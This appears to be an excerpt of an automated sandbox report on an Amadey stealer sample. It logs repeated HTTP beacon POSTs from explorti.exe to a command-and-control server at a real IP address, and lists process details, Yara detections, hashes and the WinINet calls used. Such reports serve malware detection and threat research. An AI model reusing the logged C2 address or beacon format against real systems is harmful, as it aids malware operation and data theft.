                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:51.391597986 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:52.171596050 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:52.173181057 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:52.422719002 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      42 | 192.168.2.4 | 49779 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:52.537200928 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:53.285434961 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:53.286292076 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:53.532587051 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      43 | 192.168.2.4 | 49780 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:53.640933990 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:54.403614998 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:54.404536963 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:54.655740976 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      44 | 192.168.2.4 | 49781 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:54.766233921 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:55.547815084 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:55.549182892 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:55.959820032 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      45 | 192.168.2.4 | 49782 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:56.079212904 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:56.872687101 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:56.883215904 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:57.163477898 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      46 | 192.168.2.4 | 49783 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:57.285527945 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:58.180763006 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:58.182615042 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:58.434827089 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      47 | 192.168.2.4 | 49784 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:58.550977945 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:59.303210974 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:59.304164886 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:59.551167011 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      48 | 192.168.2.4 | 49785 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:59.736005068 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:58:00.504157066 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:58:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:58:00.508196115 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:58:00.757834911 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:58:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      49 | 192.168.2.4 | 49786 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:58:00.875314951 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:58:01.802970886 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:58:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0



                      Target ID:0
                      Start time:14:55:56
                      Start date:26/07/2024
                      Path:C:\Users\user\Desktop\setup.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\setup.exe"
                      Imagebase:0x3c0000
                      File size:1'909'760 bytes
                      MD5 hash:2AF5EB9FB318C9A454DE54914E121031
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1651021209.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1691354588.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:14:55:58
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                      Imagebase:0xf50000
                      File size:1'909'760 bytes
                      MD5 hash:2AF5EB9FB318C9A454DE54914E121031
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1676236773.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1716934114.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:14:56:00
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Imagebase:0xf50000
                      File size:1'909'760 bytes
                      MD5 hash:2AF5EB9FB318C9A454DE54914E121031
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1689016813.0000000005740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1729291467.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:6
                      Start time:14:57:00
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Imagebase:0xf50000
                      File size:1'909'760 bytes
                      MD5 hash:2AF5EB9FB318C9A454DE54914E121031
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2289232500.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1694131375.0000000005150000.00000040.00001000.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5150000_setup.jbxd
                        Similarity
                        • API ID:
                        • String ID: gFl
                        • API String ID: 0-653338221
                        • Opcode ID: 404e6068da45b2a52090f05b2bbaaf732c2d0046f964f193989e9bbe563940d7
                        • Instruction ID: 0d7084a7e125ab269edcc0b737dd179566561da88ddbc86f1e1c0a66e8779450
                        • Opcode Fuzzy Hash: 404e6068da45b2a52090f05b2bbaaf732c2d0046f964f193989e9bbe563940d7
                        • Instruction Fuzzy Hash: 62F0F4EF14C225EE5159E0D537696F72B5AD5DF331732883BFC23DB102E26909845125
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1694131375.0000000005150000.00000040.00001000.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5150000_setup.jbxd
                        Similarity
                        • API ID:
                        • String ID: gFl
                        • API String ID: 0-653338221
                        • Opcode ID: 7b1b564f16f2573f142d35a8912dd63c5bc012faf8db2086357b5abcf343402f
                        • Instruction ID: b6b65f0615dc0b8e22d18e66eb87cebe3995d147d376be168bd7e0d3bae9ebcc
                        • Opcode Fuzzy Hash: 7b1b564f16f2573f142d35a8912dd63c5bc012faf8db2086357b5abcf343402f
                        • Instruction Fuzzy Hash: 680199DF14D191EE5254E0E436596F32B2AD8DF331336887BFC33CB502936505859220
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1694131375.0000000005150000.00000040.00001000.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5150000_setup.jbxd
                        Similarity
                        • API ID:
                        • String ID: gFl
                        • API String ID: 0-653338221
                        • Opcode ID: 0b2b052d238a0cef0f3472a65e6aa8ebbe9b573b49451c64f1ebcea851ddc9ee
                        • Instruction ID: c9a00c310c75771f202518b02e182854a92d829bb24a2d71cab608544bc6b9de
                        • Opcode Fuzzy Hash: 0b2b052d238a0cef0f3472a65e6aa8ebbe9b573b49451c64f1ebcea851ddc9ee
                        • Instruction Fuzzy Hash: AEF046DF18C125EE5025E0E436AD6FB2B5ED6EE3317328837FC23CB601E36A0A851121

                        Execution Graph

                        Execution Coverage:7.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:6.5%
                        Total number of Nodes:541
                        Total number of Limit Nodes:31

                        Control-flow Graph

                        APIs
                        • InternetOpenW.WININET(00FA8D68,00000000,00000000,00000000,00000000), ref: 00F5BDED
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F5BE11
                        • HttpOpenRequestA.WININET(?,00000000), ref: 00F5BE5B
                        • HttpSendRequestA.WININET(?,00000000), ref: 00F5BF1B
                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00F5BFCD
                        • InternetCloseHandle.WININET(?), ref: 00F5C0A7
                        • InternetCloseHandle.WININET(?), ref: 00F5C0AF
                        • InternetCloseHandle.WININET(?), ref: 00F5C0B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmp
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                        • String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$invalid stoi argument$stoi argument out of range$xn$n
                        • API String ID: 688256393-2251649307
                        • Opcode ID: bf4e34dea14339b78c420d0185a85859683801022b8eda36c31018f5e8f7efa6
